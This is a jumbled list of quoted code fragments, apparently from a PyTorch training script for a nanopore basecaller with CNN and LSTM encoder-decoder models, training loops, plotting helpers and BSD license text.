"Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer",
"2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100",
"copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in",
"COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"# else: # ed = 0 # ed2 = old_ed # # old_ed",
"############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True)",
"= 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" *",
"y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases:",
"in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" +",
"feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self,",
"n = param.size(0) # forget gate start, end = n//4, n//2 # ordering",
"self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn =",
"labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder #############################",
"performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train],",
"Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import",
"top1] = 1 # one hot encode input input_decoder = label if teacher_force",
"# * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size,",
"out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val,",
"#### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted,",
"loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser()",
"forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \", int((len(train_loader)",
"# sort labels so that they match with order in batch labels_sorted =",
"dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len =",
"epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref",
"end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b",
"nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear",
"torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length x input_size ####",
"list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases =",
"-1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h)",
"ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\")",
"#0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder",
"########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len,",
"class LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len, input_dim] def",
"torch.nn.functional as F import torchvision import pickle import random import time import matplotlib.pyplot",
"conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the",
"cross entropy loss # output = (seq*batch, out dim), target = (seq*batch) #",
"gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end],",
"pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn",
"= [] val_editd = [] model.eval() total_ed = 0 total_num_chars = 0 with",
"if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)),",
"descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens =",
"outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start",
"h, c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x",
"False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size",
"running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train",
"plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v",
"signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader",
"fname = args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs",
"lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def forward(self, inputs, seq_len,",
"= CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional",
"{}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5))",
"sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in",
"# ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size =",
"indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item()",
"out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value,",
"args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call",
"nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise our",
"i == max_in_batch: break # when seq length (i) >= true seq length",
"+ \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val",
"padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input,",
"val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(),",
"+ \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(),",
"#np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path",
"= args.call lr = args.learning_rate editD = args.editD sgd = False out_classes =",
"1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate)",
"open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length:",
"outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start self.end",
"self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x",
"= hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec =",
"n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate",
"dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:,",
"hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout)",
"plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"# attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2,",
"x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in",
"as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing",
"as next input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:,",
"1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self,",
"assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def",
"y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :]",
"= torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate",
"hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\")",
"(torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden()",
"i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len #",
"# unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx",
"or not teacher_force = random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size,",
"np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train,",
"\"\"\" import h5py import numpy as np import os import sys import torch",
"end], ord=2) # output gate start, end = n//2 + n//4, n input_biases[idx_b+3,",
"5: \"<PAD>\"} editd = 0 num_chars = 0 for idx, length in enumerate(target_lengths):",
"+= result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion,",
"in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256,",
"distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"",
"nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True)",
"= 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch",
"self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() #",
"plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf is not None:",
"infile = args.input fname = args.output port = args.gpu_port SEED = args.set_seed batch",
"3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\")",
"self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder",
"{}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\")",
"when seq length (i) >= true seq length if i >= true_y_len[-1].item() and",
"the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out,",
"return outputs, hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def",
"bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11",
"not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val +=",
"x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch,",
"self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token] for i in",
"port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True,",
"name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1)",
"parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?',",
"b), where a and b both have shape (num_layers, batch_size, hidden_dim). # Sort",
"one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val !=",
"pred[idx] seq_target = target[idx] encoded_pred = [] for p in seq: if p",
"dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters()",
"ord=2) # output gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx]",
"and if it has, it will make a checkpoint of the current model",
"+= ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd /",
"the above copyright notice, this list of conditions and the following disclaimer in",
"= label if teacher_force else onehot # [batch size, out dim] return outputs,",
"lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\" assert",
"updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for",
"help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) #",
"ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED",
"trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in",
"SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher",
"= own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the LSTM",
"nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim,",
"input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2,",
"= np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in p",
"def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = []",
"reduce_lr=False): #Print all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\")",
"editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3],",
"loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig",
"= n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b +=",
"teacher_force = random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features #",
"* 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd",
"vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5:",
"torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size,",
"help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number",
"own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch,",
"as F import torchvision import pickle import random import time import matplotlib.pyplot as",
"fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation:",
"self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate)",
"input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a,",
"the following disclaimer in the documentation and/or other materials provided with the distribution.",
"= nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers,",
"Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1))",
"Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input,",
"if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to check",
"p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i",
"np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if epoch ==",
"key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on trainings",
"# initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr)",
"args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn",
"self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type,",
"args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD = args.editD",
"param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4 # ordering ingate,",
"as pd import argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0,",
"# early_stopping needs the validation loss to check if it has decresed, #",
"help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on",
"encode input input_decoder = label if teacher_force else onehot # [batch size, out",
"type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\",",
"ed2 # epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit",
"sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder",
"vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit",
"fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3,",
"m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in",
"#### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm",
"count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name,",
"= param.size(0) # forget gate start, end = n//4, n//2 # ordering ingate,",
"list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error",
"{} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {}",
"batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if",
"(sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that they",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch,",
"!= 5 # indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item())",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if",
"= lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :]",
"parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio.",
"* 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear =",
"n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end =",
"read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port),",
"val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size())",
"help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output",
"if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD:",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda)",
"minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1],",
"torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size",
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR",
"in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str,",
"ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close()",
"= data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in a Variable",
"nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value,",
"%\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()),",
"GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch",
"val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set =",
"return self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i',",
"else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output",
"Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val,",
"name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget gate",
"* 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y,",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;",
"nn from torch.autograd import Variable import torch.nn.functional as F import torchvision import pickle",
"type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number",
"delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {}",
"from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v",
"len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0",
"1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate',",
"== 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc),",
"num_chars = 0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq =",
"train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue",
"[] for name in y_len: if \"bias\" in name and \"lstm\" in name",
">= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: #",
"{} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {}",
"loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else:",
"b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature),",
"LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size",
"1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments",
"decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type,",
"def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input",
